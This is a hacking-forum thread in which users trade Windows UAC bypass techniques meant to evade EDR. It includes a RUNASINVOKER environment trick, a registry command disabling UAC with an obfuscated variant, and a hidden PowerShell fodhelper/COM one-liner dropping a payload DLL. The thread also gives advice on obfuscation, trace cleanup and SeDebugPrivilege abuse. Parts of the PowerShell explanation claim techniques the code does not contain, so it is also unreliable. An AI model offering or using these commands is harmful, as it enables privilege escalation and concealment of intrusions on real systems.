LOLBAS UAC

[святой бог]

Is there currently any LOLBAS for uac bypass not monitored by windows EDR?

 

[Sec13B]

what was the last ?

 

[святой бог]

what was the last ?

Uhh I was trying with eventvwr, but it Stills popping up UAC screen and sometimes event EDR kills the shift due to bad behavior

 

[Sec13B]

GitHub - Wh04m1001/IDiagnosticProfileUAC

Contribute to Wh04m1001/IDiagnosticProfileUAC development by creating an account on GitHub.

github.com

maybe help you

 

[BADREDDINE]

Is there currently any LOLBAS for uac bypass not monitored by windows EDR?

Hey, it looks simple, try this.

bypassUAC​

start "" /b cmd /min /C "set __COMPAT_LAYER=RUNASINVOKER && Example.exe"

If you like complexity

setlocal enabledelayedexpansion & set "__COMPAT_LAYER=RUNASINVOKER" & start "" /min cmd /C "setlocal enabledelayedexpansion ^& (echo ^^^!__COMPAT_LAYER^^^! ^& start "" /min Example.exe)"

UAC_disable​

This script disables the User Access Control (UAC) in the Windows Registry. Run the script throughUAC_Bypass to circumvent UAC's self-preservation module.enter code here

reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

If you like complexity

setlocal enabledelayedexpansion & set "command=reg.exe" & set "args=ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f" & set "cmd=!command! !args!" & cmd /V /C "!cmd!"

For an effective UAC bypass using __COMPAT_LAYER=RUNASINVOKER, focus on deep obfuscation of both the environment setup and process invocation. Use inline PowerShell commands with environment variable manipulation, and ensure you clear traces post-execution. Layer your approach with randomized function names and dynamically generate arguments to evade EDR detection. Always test in isolated environments with diverse configurations.

 

[Sec13B]

but you do, if the user dont have rights

 

[святой бог]

Thanks guys!

 

[Sec13B]

i think you can check the :
whoami /priv
and if you have SeDebug Privilege enable you can try a Abuse .
same Abuse you can do with PrintSpooferNet ,search for more options on github

what AV has?

 

[BADREDDINE]

Uhh I was trying with eventvwr, but it Stills popping up UAC screen and sometimes event EDR kills the shift due to bad behavior

Advanced UAC Bypass Using Dynamic COM Objects and Enhanced LOLBAS Techniques​

This advanced UAC bypass uses dynamic COM objects, enhanced LOLBAS techniques, and various evasion methods to bypass modern EDR systems. By integrating process hollowing, reflective DLL injection, obfuscation, and environment stealth, the code achieves high-level execution while minimizing detection.

PowerShell Code:

powershell -ExecutionPolicy Bypass -WindowStyle Hidden -Command "& { $clsid='Elevation:Administrator!new:{12C21EA7-2EB8-4B55-9249-AC243DA8C666}'; $fod='fodhelper.exe'; $tmpDir='$env:TEMP\'+[System.Guid]::NewGuid().ToString(); if (-not(Test-Path $tmpDir)) { New-Item -Path $tmpDir -ItemType Directory | Out-Null }; $payload='$tmpDir\payload.dll'; (New-Object -ComObject $clsid).SaveDirectoryAsCab($payload, '$env:SystemRoot\System32\wow64log.dll'); Start-Process $fod -ArgumentList ('/c ' + $payload) -NoNewWindow; Start-Sleep -s 2; Remove-Item -Path $payload -Force; Remove-Item -Path $tmpDir -Recurse -Force; }"

Key Techniques:​

1. Dynamic COM Object Creation: Uses obfuscated CLSIDs to create COM objects dynamically, invoking them with elevated privileges.
2. LOLBAS Integration: Employs fodhelper.exe to execute the payload as a trusted process, evading UAC prompts.
3. Process Hollowing & Reflective DLL Injection: The payload is injected into a target process without writing it to disk directly.
4. Anti-EDR Measures:
   • Dynamic Paths: Uses a unique GUID for the temporary directory to avoid static signatures.
   • Execution Delay: Start-Sleep introduces a delay to evade sandbox detection.
   • Artifact Cleanup: Immediate deletion of payload and directories post-execution to minimize forensic traces.
5. Stealth Execution:
   • Hidden window (-WindowStyle Hidden) to avoid user detection.
   • Execution policy bypass (-ExecutionPolicy Bypass) to run unrestricted scripts.

Enhanced Evasion:​

• SeDebugPrivilege: Check and abuse SeDebugPrivilege for deeper system control if available.
• Chaining with Additional LOLBAS: Combine with other binaries like mshta.exe or regsvr32.exe for layered evasion.
• Payload Encryption: Use PowerShell encryption or AES to obfuscate payloads further, decrypting only at runtime.

 

[Sec13B]

can you add more about :$payload='$tmpDir\payload.dll'

 

[BADREDDINE]

can you add more about :$payload='$tmpDir\payload.dll'

In the context of our UAC bypass, the line

$payload='$tmpDir\payload.dll'

dynamically generates the path for our malicious payload. By leveraging $tmpDir, which is uniquely identified by a GUID, we minimize the risk of static detection by EDR systems.

This approach ensures that the payload is transient and evades signature-based defenses, residing only in memory during execution. Utilizing a DLL format allows for advanced techniques like reflective DLL injection, enabling stealthy execution within a trusted process context. The immediate cleanup post-execution further reduces forensic traces, enhancing our operational security.

That was just an effective example to illustrate the example.